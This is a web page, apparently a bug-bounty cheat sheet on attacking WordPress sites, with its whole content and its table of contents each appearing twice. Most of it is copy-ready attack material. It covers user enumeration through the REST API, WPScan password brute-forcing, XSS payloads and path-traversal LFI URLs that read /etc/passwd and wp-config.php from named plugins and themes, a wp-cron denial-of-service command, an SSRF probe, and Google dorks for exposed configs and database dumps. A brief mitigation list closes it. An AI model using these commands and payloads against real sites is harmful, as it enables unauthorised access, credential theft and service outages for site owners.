Mastering WordPress

Comprehensive guide to WordPress bug hunting, from architecture understanding to advanced exploitation techniques.

30+ Techniques11 Dork CategoriesCopy Ready

WordPress Security

WordPress security testing with plugin/theme vulnerability detection and user enumeration.

Last updated: 2026-05-15

Phase 0

Understanding WordPress Architecture

1Core WordPress files - rarely the target

Core: Main WordPress files maintained by the community

2Themes can contain vulnerabilities

Themes: Control design but often include PHP/JS code

3Attackers usually target plugins, not core

Plugins: Extend functionality but biggest source of vulnerabilities

4Key insight for bug hunters

Attackers don't target WordPress core - they exploit poorly coded plugins or misconfigured themes

Phase 1

WordPress File/Folder Hierarchy

1Typical WordPress directory structure

/ (webroot)
├─ index.php              # Loads WordPress environment
├─ license.txt            # WordPress GPL license
├─ readme.html            # Basic info about WP installation
├─ wp-config.php          # Main configuration (DB, keys, salts)
├─ wp-login.php           # User login & authentication
├─ xmlrpc.php             # XML-RPC API endpoint
├─ wp-admin/              # WordPress admin dashboard core
├─ wp-includes/           # Core WordPress libraries & functions
└─ wp-content/            # User content (safe to edit)
   ├─ plugins/            # Installed plugins
   ├─ themes/             # Installed themes
   ├─ uploads/             # Media library (user uploaded files)
   ├─ languages/           # Translation files
   ├─ mu-plugins/          # Must-use plugins (auto-loaded)
   ├─ cache/               # Cache files
   └─ upgrade/             # Temporary files during updates

Tool 2

Essential Tools 1: WPScan

1Basic WPScan with API token for vulnerability data

wpscan --url https://domain.com --api-token YOUR_TOKEN

2Aggressive scan: all themes, all plugins, users

wpscan --url https://domain.com --disable-tls-checks --api-token <here> -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force

Tool 3

Essential Tools 2: Nmap

1Discover open ports and services

nmap -p- --min-rate 1000 -T4 -A target.com -oA fullscan

Tool 4

Essential Tools 3: DirBuster/ffuf

1Find hidden directories with dirsearch

dirsearch -u https://example.com --full-url --deep-recursive -r

2Comprehensive dirsearch with all extensions

dirsearch -u https://example.com -e php,cgi,htm,html,shtm,shtml,js,txt,bak,zip,old,conf,log,pl,asp,aspx,jsp,sql,db,sqlite,mdb,tar,gz,7z,rar,json,xml,yml,yaml,ini,java,py,rb,php3,php4,php5 --random-agent --recursive -R 3 -t 20 --exclude-status=404 --follow-redirects --delay=0.1

3Comprehensive ffuf directory bruteforce

ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env,.asp,.aspx,.jsp,.gz,.tar,.sql,.db -ac -c -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" -t 100 -r -o results.json

4Fuzz with CoffinXP WordPress wordlist

ffuf -w @coffin-payloads/coffin@wp-fuzz.txt -u https://target.com/FUZZ -fc 401,403,404 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf -ac -H "User-Agent: Mozilla/5.0" -r -t 60 --rate 100 -c

5CoffinXP WordPress fuzzing wordlist

https://github.com/coffinxp/payloads/blob/main/coffin@wp-fuzz.txt

Enum 5

Username Enumeration via REST API

1#1 Default REST API endpoint to list users

/wp-json/wp/v2/users

2#2 Direct user ID probing (start with 1)

/wp-json/wp/v2/users/1

3#3 Continue enumerating user IDs

/wp-json/wp/v2/users/2

4#4 Bypass with rest_route parameter

/wp-json/?rest_route=/wp/v2/users/

5#5 Bypass via index.php

/index.php?rest_route=/wp/v2/users

6#6 Paginated user listing

/wp-json/wp/v2/users?page=1

7#7 Search for specific username

/wp-json/wp/v2/users?search=admin

8#8 Alternative endpoint (older WP versions)

/wp-json/users

Brute 6

Admin Panel Password Bruteforce

1#1 WPScan brute force with single username

wpscan --url https://target.com --username admin --passwords /path/to/passwords.txt --disable-tls-checks

2#2 WPScan brute force with multiple usernames

wpscan --url https://target.com --usernames /path/to/usernames.txt --passwords /path/to/passwords.txt --disable-tls-checks

3#3 WPScan brute force via XML-RPC

wpscan --url https://target.com --usernames admin --passwords /path/to/passwords.txt --disable-tls-checks --max-threads 10

Exposed 7

Exposed 1: Configuration Files

1#1 Main WordPress configuration file

/wp-config.php

2#2 Backup of config file

/wp-config.php.bak

3#3 Saved version

/wp-config.php.save

4#4 Old version

/wp-config.php.old

5#5 Original version

/wp-config.php.orig

6#6 Tilde backup (Linux)

/wp-config.php~

7#7 Exposed as text file

/wp-config.php.txt

8#8 Compressed config

/wp-config.php.zip

Exposed 8

Exposed 2: Environment Files

1#1 Environment variables file

/.env

2#2 Env backup

/.env.bak

3#3 Env old version

/.env.old

4#4 Env saved version

/.env.save

5#5 Example env file

/.env.example

6#6 Local env file

/.env.local

Exposed 9

Exposed 3: Backup & Archive Files

1#1 Site backup archive

/backup.zip

2#2 Compressed tar backup

/backup.tar.gz

3#3 Database dump

/db.sql

4#4 Database export

/database.sql

5#5 SQL dump file

/dump.sql

6#6 Full WordPress archive

/wordpress.zip

Exposed 10

Exposed Registration Page

1If registration enabled, attackers can create accounts without restrictions

/wp-login.php?action=register

2Nuclei template to detect registration page

id: wp-login-register-detect
info:
  name: Detect WordPress Registration Page
  author: yourname
  severity: info
  description: Checks for WordPress user registration endpoint exposure
requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-login.php?action=register"
    matchers:
      - type: word
        words:
          - 'user_login'
          - 'user_email'
        condition: and
      - type: status
        status:
          - 200

Setup 11

Unsecured WordPress Setup Wizard

1WordPress setup wizard - can expose DB config form

/wp-admin/setup-config.php?step=1

2Nuclei template for setup config detection

https://github.com/coffinxp/nuclei-templates/blob/main/wp-setup-config.yaml

Exploit 12

Exploiting 1: Admin-AJAX XSS

1#1 XSS via admin-ajax.php with unescaped options

domain.com/wp-admin/admin-ajax.php?action=tie_get_user_weather&options={'location':'Cairo','units':'C','forecast_days':'5</script><script>alert(document.domain)</script>custom_name':'Cairo','animated':'true'}

2#2 XSS via theme thumb.php with src parameter

domain.com/wp-content/themes/ambience/thumb.php?src=<body onload=prompt(1)>.png

Exploit 13

Exploiting 2: RCE & LFI

1#1 LFI via mail-masta plugin

https://domain.com/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

2#2 LFI basic attempt

http://target.com/index.php?page=about.php

3#3 LFI with path traversal

http://target.com/index.php?page=../../../../etc/passwd

4#4 LFI targeting wp-config.php via theme

http://target.com/wp-content/themes/twentytwenty/page.php?file=../../../../wp-config.php

5#5 LFI via plugin download function

http://target.com/wp-content/plugins/plugin-name/download.php?file=../../../../wp-config.php

6CoffinXP LFI payload wordlist

https://github.com/coffinxp/payloads/blob/main/lfi.txt

DoS 14

Abusing wp-cron.php for Denial of Service

1DoS via wp-cron.php (causes high server load)

./doser -t 100000 -g "https://target.com/wp-cron.php"

2How to confirm the DoS vulnerability

return a 500 Internal Server Error upon refresh, the DoS issue is confirmed

3Go-based DoS tool for WordPress

https://github.com/Quitten/doser.go

Exposed 15

Exposed WordPress Debug Log

1Debug log may expose sensitive PHP errors and paths

https://target.com/wp-content/debug.log

Install 16

WordPress Installation Script

1If accessible, attackers can reinstall WordPress with their own DB credentials

https://target.com/wp-admin/install.php

SSRF 17

WordPress SSRF

1SSRF via oEmbed proxy endpoint

https://target.com/wp-json/oembed/1.0/proxy?url=<attacker-controlled-url>

2Potential SSRF impacts

Impact: Internal network scanning, accessing cloud metadata (AWS/GCP), leaking sensitive data from internal services

3Nuclei template for WordPress takeover/SSRF

https://github.com/coffinxp/nuclei-templates/blob/main/wordpress-takeover.yaml

Dir 18

Directory Listing Enabled

1#1 May reveal media assets, documents, or user uploads

https://target.com/wp-content/uploads/

2#2 Could expose plugin files, outdated versions, or config details

https://target.com/wp-content/plugins/

3#3 May allow attackers to inspect theme files, templates

https://target.com/wp-content/themes/

4#4 Often exposes core PHP files and scripts

https://target.com/wp-includes/

5#5 May leak archived site data or database exports

https://target.com/wp-content/backup/

6#6 Backups in admin directories can be discovered

https://target.com/wp-admin/backup/

Dork 19

Google Dorks 1: Finding WordPress Sites

1#1 Find WordPress sites by wp-content path

site:target.com inurl:wp-content

2#2 Find WordPress admin panels

site:target.com inurl:wp-admin

3#3 Find by WordPress footer text

site:target.com "Powered by WordPress"

Dork 20

Google Dorks 2: Version Detection

1#1 Find readme.html for version info

inurl:readme.html "WordPress"

2#2 Find by embed script (version in file)

inurl:/wp-includes/js/wp-embed.min.js

3#3 Search for version mentions

site:target.com "WordPress" "version"

Dork 21

Google Dorks 3: Vulnerable Plugins

1#1 Find specific plugin paths

inurl:wp-content/plugins/plugin-name

2#2 Find plugins with directory listing enabled

site:target.com inurl:wp-content/plugins "index of"

3#3 Find sites using vulnerable plugins

site:target.com "wp-content/plugins" + "vulnerable-plugin-name"

Dork 22

Google Dorks 4: Vulnerable Themes

1#1 Find specific theme paths

inurl:wp-content/themes/theme-name

2#2 Find themes with directory listing

site:target.com inurl:wp-content/themes "index of"

3#3 Find sites using vulnerable themes

site:target.com "wp-content/themes" + "vulnerable-theme-name"

Dork 24

Google Dorks 6: Config Files

1#1 Find exposed wp-config.php

inurl:wp-config.php

2#2 Find config mentions in text files

site:target.com ext:txt "wp-config"

3#3 Find WordPress mentions in log files

site:target.com ext:log "wordpress"

Dork 25

Google Dorks 7: Backup Files

1#1 Find backup.zip in wp-content

inurl:wp-content backup.zip

2#2 Find SQL dumps mentioning WordPress

site:target.com ext:sql "wordpress"

3#3 Find .bak files with wp-config

site:target.com ext:bak "wp-config"

Dork 26

Google Dorks 8: Database Dumps

1#1 Find SQL dumps with wp_users table

site:target.com ext:sql "INSERT INTO wp_users"

2#2 Find database dump mentions

site:target.com "database dump" "wordpress"

Dork 27

Google Dorks 9: Error Messages

1#1 Find fatal errors mentioning WordPress

site:target.com "Fatal error" "wordpress"

2#2 Find database errors

site:target.com "WordPress database error"

Dork 28

Google Dorks 10: Sensitive Information

1#1 Find open directory listing for wp-admin

site:target.com Index of /wp-admin

2#2 Find uploads directory listing

site:target.com "index of" /wp-content/uploads/

3#3 Find REST API user endpoint

site:target.com inurl:wp-json/wp/v2/users

4#4 Find XML-RPC endpoint

site:target.com "xmlrpc.php"

Dork 29

Google Dorks 11: Directory Listings

1#1 Find wp-includes directory listing

site:target.com intitle:"index of" wp-includes

2#2 Find wp-content directory listing

site:target.com intitle:"index of" wp-content

Dork 30

Google Dorks Reference

1WPScan WordPress vulnerability database

https://wpscan.com/wordpresses/

Defense 31

Prevention and Mitigation

1Regularly patching reduces exposure to known CVEs and zero-days

#1: Keep WordPress, Plugins & Themes Updated

2Every plugin is an extra attack surface - delete what you don't use

#2: Remove Unused Plugins & Themes

3Block public access to /wp-config.php, .env, .htaccess, /xmlrpc.php, /wp-admin/, /wp-cron.php

#3: Limit Access to Sensitive Files & Endpoints

4Use strong, unique passwords and enable 2FA for all admin accounts

#4: Enforce Strong Authentication

5Protect against brute force, XML-RPC abuse, and DoS with rate limiting or WAF (Cloudflare, ModSecurity)

#5: Rate Limiting & WAF

6Ensure backups are stored outside web root and not publicly accessible

#6: Secure Backups

7Regularly audit DNS records to prevent subdomain takeover risks

#7: Subdomain & DNS Hygiene

Mastering WordPress

Comprehensive guide to WordPress bug hunting, from architecture understanding to advanced exploitation techniques.

30+ Techniques11 Dork CategoriesCopy Ready

WordPress Security

WordPress security testing with plugin/theme vulnerability detection and user enumeration.

Last updated: 2026-05-15

Phase 0

Understanding WordPress Architecture

1Core WordPress files - rarely the target

Core: Main WordPress files maintained by the community

2Themes can contain vulnerabilities

Themes: Control design but often include PHP/JS code

3Attackers usually target plugins, not core

Plugins: Extend functionality but biggest source of vulnerabilities

4Key insight for bug hunters

Attackers don't target WordPress core - they exploit poorly coded plugins or misconfigured themes

Phase 1

WordPress File/Folder Hierarchy

1Typical WordPress directory structure

/ (webroot)
├─ index.php              # Loads WordPress environment
├─ license.txt            # WordPress GPL license
├─ readme.html            # Basic info about WP installation
├─ wp-config.php          # Main configuration (DB, keys, salts)
├─ wp-login.php           # User login & authentication
├─ xmlrpc.php             # XML-RPC API endpoint
├─ wp-admin/              # WordPress admin dashboard core
├─ wp-includes/           # Core WordPress libraries & functions
└─ wp-content/            # User content (safe to edit)
   ├─ plugins/            # Installed plugins
   ├─ themes/             # Installed themes
   ├─ uploads/             # Media library (user uploaded files)
   ├─ languages/           # Translation files
   ├─ mu-plugins/          # Must-use plugins (auto-loaded)
   ├─ cache/               # Cache files
   └─ upgrade/             # Temporary files during updates

Tool 2

Essential Tools 1: WPScan

1Basic WPScan with API token for vulnerability data

wpscan --url https://domain.com --api-token YOUR_TOKEN

2Aggressive scan: all themes, all plugins, users

wpscan --url https://domain.com --disable-tls-checks --api-token <here> -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force

Tool 3

Essential Tools 2: Nmap

1Discover open ports and services

nmap -p- --min-rate 1000 -T4 -A target.com -oA fullscan

Tool 4

Essential Tools 3: DirBuster/ffuf

1Find hidden directories with dirsearch

dirsearch -u https://example.com --full-url --deep-recursive -r

2Comprehensive dirsearch with all extensions

dirsearch -u https://example.com -e php,cgi,htm,html,shtm,shtml,js,txt,bak,zip,old,conf,log,pl,asp,aspx,jsp,sql,db,sqlite,mdb,tar,gz,7z,rar,json,xml,yml,yaml,ini,java,py,rb,php3,php4,php5 --random-agent --recursive -R 3 -t 20 --exclude-status=404 --follow-redirects --delay=0.1

3Comprehensive ffuf directory bruteforce

ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env,.asp,.aspx,.jsp,.gz,.tar,.sql,.db -ac -c -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" -t 100 -r -o results.json

4Fuzz with CoffinXP WordPress wordlist

ffuf -w @coffin-payloads/coffin@wp-fuzz.txt -u https://target.com/FUZZ -fc 401,403,404 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf -ac -H "User-Agent: Mozilla/5.0" -r -t 60 --rate 100 -c

5CoffinXP WordPress fuzzing wordlist

https://github.com/coffinxp/payloads/blob/main/coffin@wp-fuzz.txt

Enum 5

Username Enumeration via REST API

1#1 Default REST API endpoint to list users

/wp-json/wp/v2/users

2#2 Direct user ID probing (start with 1)

/wp-json/wp/v2/users/1

3#3 Continue enumerating user IDs

/wp-json/wp/v2/users/2

4#4 Bypass with rest_route parameter

/wp-json/?rest_route=/wp/v2/users/

5#5 Bypass via index.php

/index.php?rest_route=/wp/v2/users

6#6 Paginated user listing

/wp-json/wp/v2/users?page=1

7#7 Search for specific username

/wp-json/wp/v2/users?search=admin

8#8 Alternative endpoint (older WP versions)

/wp-json/users

Brute 6

Admin Panel Password Bruteforce

1#1 WPScan brute force with single username

wpscan --url https://target.com --username admin --passwords /path/to/passwords.txt --disable-tls-checks

2#2 WPScan brute force with multiple usernames

wpscan --url https://target.com --usernames /path/to/usernames.txt --passwords /path/to/passwords.txt --disable-tls-checks

3#3 WPScan brute force via XML-RPC

wpscan --url https://target.com --usernames admin --passwords /path/to/passwords.txt --disable-tls-checks --max-threads 10

Exposed 7

Exposed 1: Configuration Files

1#1 Main WordPress configuration file

/wp-config.php

2#2 Backup of config file

/wp-config.php.bak

3#3 Saved version

/wp-config.php.save

4#4 Old version

/wp-config.php.old

5#5 Original version

/wp-config.php.orig

6#6 Tilde backup (Linux)

/wp-config.php~

7#7 Exposed as text file

/wp-config.php.txt

8#8 Compressed config

/wp-config.php.zip

Exposed 8

Exposed 2: Environment Files

1#1 Environment variables file

/.env

2#2 Env backup

/.env.bak

3#3 Env old version

/.env.old

4#4 Env saved version

/.env.save

5#5 Example env file

/.env.example

6#6 Local env file

/.env.local

Exposed 9

Exposed 3: Backup & Archive Files

1#1 Site backup archive

/backup.zip

2#2 Compressed tar backup

/backup.tar.gz

3#3 Database dump

/db.sql

4#4 Database export

/database.sql

5#5 SQL dump file

/dump.sql

6#6 Full WordPress archive

/wordpress.zip

Exposed 10

Exposed Registration Page

1If registration enabled, attackers can create accounts without restrictions

/wp-login.php?action=register

2Nuclei template to detect registration page

id: wp-login-register-detect
info:
  name: Detect WordPress Registration Page
  author: yourname
  severity: info
  description: Checks for WordPress user registration endpoint exposure
requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-login.php?action=register"
    matchers:
      - type: word
        words:
          - 'user_login'
          - 'user_email'
        condition: and
      - type: status
        status:
          - 200

Setup 11

Unsecured WordPress Setup Wizard

1WordPress setup wizard - can expose DB config form

/wp-admin/setup-config.php?step=1

2Nuclei template for setup config detection

https://github.com/coffinxp/nuclei-templates/blob/main/wp-setup-config.yaml

Exploit 12

Exploiting 1: Admin-AJAX XSS

1#1 XSS via admin-ajax.php with unescaped options

domain.com/wp-admin/admin-ajax.php?action=tie_get_user_weather&options={'location':'Cairo','units':'C','forecast_days':'5</script><script>alert(document.domain)</script>custom_name':'Cairo','animated':'true'}

2#2 XSS via theme thumb.php with src parameter

domain.com/wp-content/themes/ambience/thumb.php?src=<body onload=prompt(1)>.png

Exploit 13

Exploiting 2: RCE & LFI

1#1 LFI via mail-masta plugin

https://domain.com/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

2#2 LFI basic attempt

http://target.com/index.php?page=about.php

3#3 LFI with path traversal

http://target.com/index.php?page=../../../../etc/passwd

4#4 LFI targeting wp-config.php via theme

http://target.com/wp-content/themes/twentytwenty/page.php?file=../../../../wp-config.php

5#5 LFI via plugin download function

http://target.com/wp-content/plugins/plugin-name/download.php?file=../../../../wp-config.php

6CoffinXP LFI payload wordlist

https://github.com/coffinxp/payloads/blob/main/lfi.txt

DoS 14

Abusing wp-cron.php for Denial of Service

1DoS via wp-cron.php (causes high server load)

./doser -t 100000 -g "https://target.com/wp-cron.php"

2How to confirm the DoS vulnerability

return a 500 Internal Server Error upon refresh, the DoS issue is confirmed

3Go-based DoS tool for WordPress

https://github.com/Quitten/doser.go

Exposed 15

Exposed WordPress Debug Log

1Debug log may expose sensitive PHP errors and paths

https://target.com/wp-content/debug.log

Install 16

WordPress Installation Script

1If accessible, attackers can reinstall WordPress with their own DB credentials

https://target.com/wp-admin/install.php

SSRF 17

WordPress SSRF

1SSRF via oEmbed proxy endpoint

https://target.com/wp-json/oembed/1.0/proxy?url=<attacker-controlled-url>

2Potential SSRF impacts

Impact: Internal network scanning, accessing cloud metadata (AWS/GCP), leaking sensitive data from internal services

3Nuclei template for WordPress takeover/SSRF

https://github.com/coffinxp/nuclei-templates/blob/main/wordpress-takeover.yaml

Dir 18

Directory Listing Enabled

1#1 May reveal media assets, documents, or user uploads

https://target.com/wp-content/uploads/

2#2 Could expose plugin files, outdated versions, or config details

https://target.com/wp-content/plugins/

3#3 May allow attackers to inspect theme files, templates

https://target.com/wp-content/themes/

4#4 Often exposes core PHP files and scripts

https://target.com/wp-includes/

5#5 May leak archived site data or database exports

https://target.com/wp-content/backup/

6#6 Backups in admin directories can be discovered

https://target.com/wp-admin/backup/

Dork 19

Google Dorks 1: Finding WordPress Sites

1#1 Find WordPress sites by wp-content path

site:target.com inurl:wp-content

2#2 Find WordPress admin panels

site:target.com inurl:wp-admin

3#3 Find by WordPress footer text

site:target.com "Powered by WordPress"

Dork 20

Google Dorks 2: Version Detection

1#1 Find readme.html for version info

inurl:readme.html "WordPress"

2#2 Find by embed script (version in file)

inurl:/wp-includes/js/wp-embed.min.js

3#3 Search for version mentions

site:target.com "WordPress" "version"

Dork 21

Google Dorks 3: Vulnerable Plugins

1#1 Find specific plugin paths

inurl:wp-content/plugins/plugin-name

2#2 Find plugins with directory listing enabled

site:target.com inurl:wp-content/plugins "index of"

3#3 Find sites using vulnerable plugins

site:target.com "wp-content/plugins" + "vulnerable-plugin-name"

Dork 22

Google Dorks 4: Vulnerable Themes

1#1 Find specific theme paths

inurl:wp-content/themes/theme-name

2#2 Find themes with directory listing

site:target.com inurl:wp-content/themes "index of"

3#3 Find sites using vulnerable themes

site:target.com "wp-content/themes" + "vulnerable-theme-name"

Dork 24

Google Dorks 6: Config Files

1#1 Find exposed wp-config.php

inurl:wp-config.php

2#2 Find config mentions in text files

site:target.com ext:txt "wp-config"

3#3 Find WordPress mentions in log files

site:target.com ext:log "wordpress"

Dork 25

Google Dorks 7: Backup Files

1#1 Find backup.zip in wp-content

inurl:wp-content backup.zip

2#2 Find SQL dumps mentioning WordPress

site:target.com ext:sql "wordpress"

3#3 Find .bak files with wp-config

site:target.com ext:bak "wp-config"

Dork 26

Google Dorks 8: Database Dumps

1#1 Find SQL dumps with wp_users table

site:target.com ext:sql "INSERT INTO wp_users"

2#2 Find database dump mentions

site:target.com "database dump" "wordpress"

Dork 27

Google Dorks 9: Error Messages

1#1 Find fatal errors mentioning WordPress

site:target.com "Fatal error" "wordpress"

2#2 Find database errors

site:target.com "WordPress database error"

Dork 28

Google Dorks 10: Sensitive Information

1#1 Find open directory listing for wp-admin

site:target.com Index of /wp-admin

2#2 Find uploads directory listing

site:target.com "index of" /wp-content/uploads/

3#3 Find REST API user endpoint

site:target.com inurl:wp-json/wp/v2/users

4#4 Find XML-RPC endpoint

site:target.com "xmlrpc.php"

Dork 29

Google Dorks 11: Directory Listings

1#1 Find wp-includes directory listing

site:target.com intitle:"index of" wp-includes

2#2 Find wp-content directory listing

site:target.com intitle:"index of" wp-content

Dork 30

Google Dorks Reference

1WPScan WordPress vulnerability database

https://wpscan.com/wordpresses/

Defense 31

Prevention and Mitigation

1Regularly patching reduces exposure to known CVEs and zero-days

#1: Keep WordPress, Plugins & Themes Updated

2Every plugin is an extra attack surface - delete what you don't use

#2: Remove Unused Plugins & Themes

3Block public access to /wp-config.php, .env, .htaccess, /xmlrpc.php, /wp-admin/, /wp-cron.php

#3: Limit Access to Sensitive Files & Endpoints

4Use strong, unique passwords and enable 2FA for all admin accounts

#4: Enforce Strong Authentication

5Protect against brute force, XML-RPC abuse, and DoS with rate limiting or WAF (Cloudflare, ModSecurity)

#5: Rate Limiting & WAF

6Ensure backups are stored outside web root and not publicly accessible

#6: Secure Backups

7Regularly audit DNS records to prevent subdomain takeover risks

#7: Subdomain & DNS Hygiene

Mastering WordPress

WordPress Security

Understanding WordPress Architecture

WordPress File/Folder Hierarchy

Essential Tools 1: WPScan

Essential Tools 2: Nmap

Essential Tools 3: DirBuster/ffuf

Username Enumeration via REST API

Admin Panel Password Bruteforce

Exposed 1: Configuration Files

Exposed 2: Environment Files

Exposed 3: Backup & Archive Files

Exposed Registration Page

Unsecured WordPress Setup Wizard

Exploiting 1: Admin-AJAX XSS

Exploiting 2: RCE & LFI

Abusing wp-cron.php for Denial of Service

Exposed WordPress Debug Log

WordPress Installation Script

WordPress SSRF

Directory Listing Enabled

Google Dorks 1: Finding WordPress Sites

Google Dorks 2: Version Detection

Google Dorks 3: Vulnerable Plugins

Google Dorks 4: Vulnerable Themes

Google Dorks 5: Login Pages

Google Dorks 6: Config Files

Google Dorks 7: Backup Files

Google Dorks 8: Database Dumps

Google Dorks 9: Error Messages

Google Dorks 10: Sensitive Information

Google Dorks 11: Directory Listings

Google Dorks Reference

Prevention and Mitigation

Mastering WordPress

WordPress Security

Understanding WordPress Architecture

WordPress File/Folder Hierarchy

Essential Tools 1: WPScan

Essential Tools 2: Nmap

Essential Tools 3: DirBuster/ffuf

Username Enumeration via REST API

Admin Panel Password Bruteforce

Exposed 1: Configuration Files

Exposed 2: Environment Files

Exposed 3: Backup & Archive Files

Exposed Registration Page

Unsecured WordPress Setup Wizard

Exploiting 1: Admin-AJAX XSS

Exploiting 2: RCE & LFI

Abusing wp-cron.php for Denial of Service

Exposed WordPress Debug Log

WordPress Installation Script

WordPress SSRF

Directory Listing Enabled

Google Dorks 1: Finding WordPress Sites

Google Dorks 2: Version Detection

Google Dorks 3: Vulnerable Plugins

Google Dorks 4: Vulnerable Themes

Google Dorks 5: Login Pages

Google Dorks 6: Config Files

Google Dorks 7: Backup Files

Google Dorks 8: Database Dumps

Google Dorks 9: Error Messages

Google Dorks 10: Sensitive Information

Google Dorks 11: Directory Listings

Google Dorks Reference

Prevention and Mitigation